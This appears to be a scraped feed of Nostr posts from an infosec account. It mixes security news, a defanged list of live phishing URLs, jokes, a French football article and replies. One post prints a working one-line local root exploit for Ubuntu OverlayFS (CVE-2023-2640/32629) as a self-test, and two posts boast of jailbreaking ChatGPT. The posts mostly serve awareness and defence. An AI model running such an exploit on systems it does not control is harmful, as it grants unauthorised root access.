If you use #Microsoft #Teams be careful with #terrorist aka (russia)
mass #phishing #campaign is deployed.
https://www.theregister.com/2023/08/03/microsoft_teams_cozy_bear/
#ethicalhacking #infosec #cybersecurity #nostr
#Amazon's #AWS SSM agent can be used as post-exploitation RAT #malware
Abusing the SSM agent allows attackers to breach AWS accounts to execute commands remotely without being detected, as the traffic looks like regular activity generated by the agents.
#ethicalhacking #infosec #cybersecurity #nostr
#Criminals to auction off #DNA records stolen in data #breach of McAlester Regional Health Center
#ethicalhacking #infosec #cybersecurity #nostr
Le Temps (Suisse)
Pour la Suisse, la meilleure attaque, c’est la défense
L’équipe d’Inka Grings a atteint les huitièmes de finale de la Coupe du monde sans marquer contre ses deux meilleures adversaires. Mais doit-elle se réinventer pour y parvenir samedi contre l’Espagne? Pas forcément, préviennent plusieurs experts
L’adage prétend que la meilleure défense, c’est l’attaque? L’équipe de Suisse explore l’hypothèse inverse à la Coupe du monde océanienne. Au premier tour, elle n’a inscrit que deux buts en trois matchs, dont un sur penalty, mais cela a suffi pour terminer première du groupe A. En huitièmes de finale, samedi à 7h (heure suisse) à Auckland (Nouvelle-Zélande), elle affronte une Espagne joueuse mais friable défensivement, qui vient de s’incliner 4-0 contre le Japon. Mais ce n’est pas pour autant le moment de se découvrir, estiment plusieurs experts consultés par Le Temps.
https://www.letemps.ch/articles/pour-la-suisse-la-meilleure-attaque-c-est-la-defense
#Presse #letemps #Suisse
Please parse your html code properly that we can read the news instead of the code.
Weekly #Phishing or #Malicious #URL
ℹ️ links are broken to avoid accidentally click ℹ️
#Bank of America Phishing Site
hxxp://kez[.]coo[.]mybluehost[.]me/home/login[.]php?cmd=login_submit&id=dfcbf99ae78eeb4f1b03fdf60d6c11a5dfcbf99ae78eeb4f1b03fdf60d6c11a5&session=dfcbf99ae78eeb4f1b03fdf60d6c11a5dfcbf99ae78eeb4f1b03fdf60d6c11a5
#French Government Fine Payment Page Phishing Site
hxxps://mon-amende-gouv-fr[.]com/infospage[.]php
#Navy Federal Credit Union Phishing Site
hxxps://bright-furtive-mitten[.]glitch[.]me/public/Gsddfgotp[.]HTM
#Facebook Phishing Sites
hxxps://auto-czarnecki[.]pl/authorize[.]php
hxxps://25442578989888v5579655[.]filesusr[.]com/html/407990_268ecc9148f062ba30941076878b52c5.html?8607929*cGVsb25tZWxvbjEyMzRAZ21haWwuY29t*https://www_facebook_com/=
#Garena Phishing Site
hxxp://ff[.]memberr[.]gearena[.]vn/fimbaxtcrs59fy8gplnbzcqjscoxmmk8kuk
#Telekom Deutschland GmbH Phishing Site
hxxps://hadeedethopia[.]nyatechservices[.]com/lnkl/ios/oauth2/index[.]php/
Coupang Phishing Site
hxxp://kclea[.]or[.]kr/online/data[.]php
#Naver Phishing Sites
hxxp://jhusinagem[.]com[.]br/new/wp-includes/certificates/indexh[.]html
hxxps://silkyoriginalstructures[.]azrefmrnc[.]repl[.]co/?naps
#ethicalhacking #infosec #cybersecurity #nostr #keepsafe
Abusing of #chatgpt 😂😂😂
That is way you shouldn't trust on chatgpt or at least not 100% always do your checks.
In this example i have made a simple question but in a different way.
And the chatgpt fails successfully 😂😂😂

Now let's make the same question but with a misspelling marked as red
😂😂😂😂
#funny #nostr

Do you need a web interface for #DNS queries?
You can use diggui, which provides an online #dig service with helpful tips.
#ethicalhacking #infosec #cybersecurity #nostr
LeakIX is a platform combining a search engine that indexes public information by scanning the Internet with an open reporting platform linked to the results.
#ethicalhacking #infosec #cybersecurity #nostr
X, formerly Twitter, now lets paid users hide their checkmarks
Social media company X, formerly Twitter, now lets paid users hide their verification checkmarks. The Elon Musk-owned company introduced paid verification last year with the Twitter Blue relaunch. The...
https://techcrunch.com/2023/08/01/x-twitter-paid-users-hide-checkmarks/
Yes hide that shame
Successfully #jailbreak chatgpt on #android 😀👍️


#ethicalhacking #infosec #cybersecurity #nostr #jailbreak
#ubuntu local privilege escalation
CVE-2023-2640 CVE-2023-32629
A critical privilege escalation vulnerability in the Ubuntu kernel regarding OverlayFS have been identified.
It basically allows a low privileged user account on your system to obtain root privileges.
Public exploit code was published already and is quite easy to exploit.
If you want to test whether your system is affected, you may execute the following PoC code from a low privileged user account on your Ubuntu system. If you get an output, telling you the root account's id, then you are affected.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'";rm -rf l u w m
Reference
https://nvd.nist.gov/vuln/detail/CVE-2023-32629
#ethicalhacking #infosec #cybersecurity #nostr
Why did #Nostr users always get the biggest audiences?
Because their posts were simply "nostrifying"! 😄
#share
What nostr:npub1wmr34t36fy03m8hvgl96zl3znndyzyaqhwmwdtshwmtkg03fetaqhjg240 have said schould works but i just want to add:
Don't take that for granted.....
Never stops a admin relay to make backups every hour for example and restore that backups when they want.
Why don't some couples go to the gym?
Because some relationships don't work out! 😄
#humor #funny
Why do cybersecurity experts prefer to swim with dolphins? Because they know dolphins are excellent at detecting #phishing attempts! 🐬🔒😄
#ethicalhacking #infosec #cybersecurity #nostr
Don't worry, you're definitely here, and your presence matters. You're not alone, and we're here for you. If you ever need someone to talk to, feel free to reach out. Sending you positive vibes and a virtual hug!
Is that not against the purpose of #nostr and against decentralized? 🤔
Good 😀 when i see that tower again i will remember Malmö 😀
Wishing you a nice time with friends
Keep safe
Logout and login back again where? The same nostr client? What you described can happen if you use another client or different relays putting back the "old" relays that you used before solves the problem.